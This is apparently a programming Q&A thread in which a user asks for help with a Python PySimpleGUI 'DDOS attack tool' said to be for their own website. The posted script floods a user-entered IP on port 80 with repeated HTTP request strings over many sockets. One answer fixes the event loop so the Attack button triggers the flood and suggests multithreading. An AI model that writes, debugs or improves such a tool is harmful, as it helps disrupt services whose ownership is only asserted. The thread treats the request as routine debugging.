# PySimpleGUI ddosing (for my website only) tool not working

Tags: python, sockets, ddos, pysimplegui, security

The ddos tool is not working.
Here is the traceback of this script. I am unsure of what do to fix all of this as it is my first GUI.
**Traceback (most recent call last):
File "C:\Users\pchaf\Downloads\Python Scripts\Cyber Security\DDOS_GUI.py", line 22, in 
s.connect((values[0],80))
TypeError: 'NoneType' object is not subscriptable**

```py
import PySimpleGUI as sg
import socket

sg.theme('DarkAmber')   # Add a touch of color
# All the content I have in my window
layout = [  [sg.Text('Simple Python DDOS Attack tool.')],
            [sg.Text('Enter IP'), sg.InputText()],
            [sg.Button('Attack'), sg.Button('Cancel')] ]

# Create the Window
window = sg.Window('DDOS Python.', layout)
#.
while True:
    event, values = window.read()
    if event == sg.WIN_CLOSED or event == 'Cancel': # if user closes window or clicks cancel
        break

window.close()

# The ddos 

for i in range(1,100):
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((values[0],80))
    data = b"GET / HTTP 1.1\r\n"*1000
    s.send(data)
    s.close()
```

Answer (score 0):

When you are doing `s.connect((values[0],80))` you have to pass IP address of the computer whom you want to ddos

Thanks

Answer (score 0):

In your code, event loop break only when close button or cancel button clicked, and window close, then go your ddos code.

So if you click `Attack`, it will do nothing and back to event loop. If you click `Cancel` button, then run your ddos code, it should be OK.

If you click close button of window, you will get `None` for `values`, that's why you get following message for `values[0]`.

```py
'NoneType' object is not subscriptable
```

Should change code like this,

```py
import PySimpleGUI as sg
import socket

sg.theme('DarkAmber')   # Add a touch of color
# All the content I have in my window
layout = [  [sg.Text('Simple Python DDOS Attack tool.')],
            [sg.Text('Enter IP'), sg.InputText()],
            [sg.Button('Attack'), sg.Button('Cancel')] ]

# Create the Window
window = sg.Window('DDOS Python.', layout)
#.
while True:
    event, values = window.read()
    print(event, values)
    if event == sg.WIN_CLOSED or event == 'Cancel': # if user closes window or clicks cancel
        break
    elif event == 'Attack':
        # The ddos
        for i in range(1,100):
            s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
            s.connect((values[0],80))
            data = b"GET / HTTP 1.1\r\n"*1000
            s.send(data)
            s.close()

window.close()
```

Note: ddos which if take long time may let GUI winow no response in short time. Multi-thread maybe reuired for it.